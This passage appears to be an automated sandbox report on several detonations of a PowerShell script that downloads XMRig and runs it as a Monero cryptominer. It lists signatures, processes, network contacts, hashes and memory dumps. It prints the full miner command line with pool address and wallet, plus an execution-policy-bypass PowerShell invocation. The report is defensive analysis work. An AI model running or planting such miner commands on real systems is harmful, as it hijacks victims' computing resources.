memory/4064-65-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-66-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-67-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-68-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-69-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-70-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-71-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-72-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-73-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-74-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-75-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-76-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-77-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-78-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-79-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-80-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-81-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-82-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-83-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-84-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-85-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-86-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-87-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-88-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-89-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-90-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-91-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-92-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-93-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-94-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-95-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-96-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-97-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-98-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-99-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-100-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-101-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-102-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-103-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-104-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-105-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-106-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-107-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-108-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-109-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-110-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-111-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-112-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-113-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-114-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-115-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-116-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

Analysis: behavioral14

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 01:58

Platform

win10-20240404-en

Max time kernel

1798s

Max time network

1755s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 107.116.69.13.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp

Files

memory/4988-3-0x00007FF98AAA3000-0x00007FF98AAA4000-memory.dmp

memory/4988-5-0x000001D6D4770000-0x000001D6D4792000-memory.dmp

memory/4988-6-0x00007FF98AAA0000-0x00007FF98B48C000-memory.dmp

memory/4988-9-0x000001D6ECDC0000-0x000001D6ECE36000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ziy0wmgm.tgb.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4988-10-0x00007FF98AAA0000-0x00007FF98B48C000-memory.dmp

memory/4988-25-0x00007FF98AAA0000-0x00007FF98B48C000-memory.dmp

memory/4988-48-0x000001D6D4940000-0x000001D6D4952000-memory.dmp

memory/4988-61-0x000001D6D4930000-0x000001D6D493A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4444-90-0x0000025449AC0000-0x0000025449AE0000-memory.dmp

memory/4444-91-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4988-92-0x00007FF98AAA0000-0x00007FF98B48C000-memory.dmp

memory/4988-94-0x00007FF98AAA3000-0x00007FF98AAA4000-memory.dmp

memory/4444-93-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4988-95-0x00007FF98AAA0000-0x00007FF98B48C000-memory.dmp

memory/4444-96-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-97-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-98-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-99-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-100-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-101-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-102-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-103-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-104-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-105-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-106-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-107-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-108-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-109-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-110-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-111-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-112-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-113-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-114-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-115-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-116-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-117-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-118-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-119-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-120-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-121-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-122-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-123-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-124-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-125-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-126-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-127-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-128-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-129-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-130-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-131-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-132-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-133-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-134-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-135-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-136-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-137-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-138-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-139-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-140-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-141-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-142-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-143-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-144-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-145-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-146-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-147-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-148-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-149-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-150-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-151-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-152-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-153-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-154-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-155-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-156-0x00007FF651D60000-0x00007FF652993000-memory.dmp

Analysis: behavioral17

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 01:59

Platform

win10-20240404-en

Max time kernel

1798s

Max time network

1762s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 4.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 91.90.14.23.in-addr.arpa udp

Files

memory/512-4-0x00007FFE943D3000-0x00007FFE943D4000-memory.dmp

memory/512-5-0x000002F8B4000000-0x000002F8B4022000-memory.dmp

memory/512-6-0x00007FFE943D0000-0x00007FFE94DBC000-memory.dmp

memory/512-9-0x00007FFE943D0000-0x00007FFE94DBC000-memory.dmp

memory/512-10-0x000002F8B42C0000-0x000002F8B4336000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tumb5v2k.fkz.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/512-25-0x00007FFE943D0000-0x00007FFE94DBC000-memory.dmp

memory/512-48-0x000002F8B4450000-0x000002F8B4462000-memory.dmp

memory/512-61-0x000002F8B4090000-0x000002F8B409A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4112-90-0x00000291289A0000-0x00000291289C0000-memory.dmp

memory/4112-91-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-92-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/512-93-0x00007FFE943D3000-0x00007FFE943D4000-memory.dmp

memory/512-94-0x00007FFE943D0000-0x00007FFE94DBC000-memory.dmp

memory/512-95-0x00007FFE943D0000-0x00007FFE94DBC000-memory.dmp

memory/4112-96-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-97-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-98-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-99-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-100-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-101-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-102-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-103-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-104-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-105-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-106-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-107-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-108-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-109-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-110-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-111-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-112-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-113-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-114-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-115-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-116-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-117-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-118-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-119-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-120-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-121-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-122-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-123-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-124-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-125-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-126-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-127-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-128-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-129-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-130-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-131-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-132-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-133-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-134-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-135-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-136-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-137-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-138-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-139-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-140-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-141-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-142-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-143-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-144-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-145-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-146-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-147-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-148-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-149-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-150-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-151-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-152-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-153-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-154-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-155-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-156-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

Analysis: behavioral24

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 02:04

Platform

win11-20240508-en

Max time kernel

1799s

Max time network

1792s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
GB 20.26.156.215:443 github.com tcp
US 185.199.111.133:443 objects.githubusercontent.com tcp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp

Files

memory/2088-0-0x00007FFD124B3000-0x00007FFD124B5000-memory.dmp

memory/2088-9-0x00000237F4AB0000-0x00000237F4AD2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cyj55zdw.zth.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2088-10-0x00007FFD124B0000-0x00007FFD12F72000-memory.dmp

memory/2088-11-0x00007FFD124B0000-0x00007FFD12F72000-memory.dmp

memory/2088-12-0x00007FFD124B0000-0x00007FFD12F72000-memory.dmp

memory/2088-14-0x00000237F4B20000-0x00000237F4B32000-memory.dmp

memory/2088-15-0x00000237F4A20000-0x00000237F4A2A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

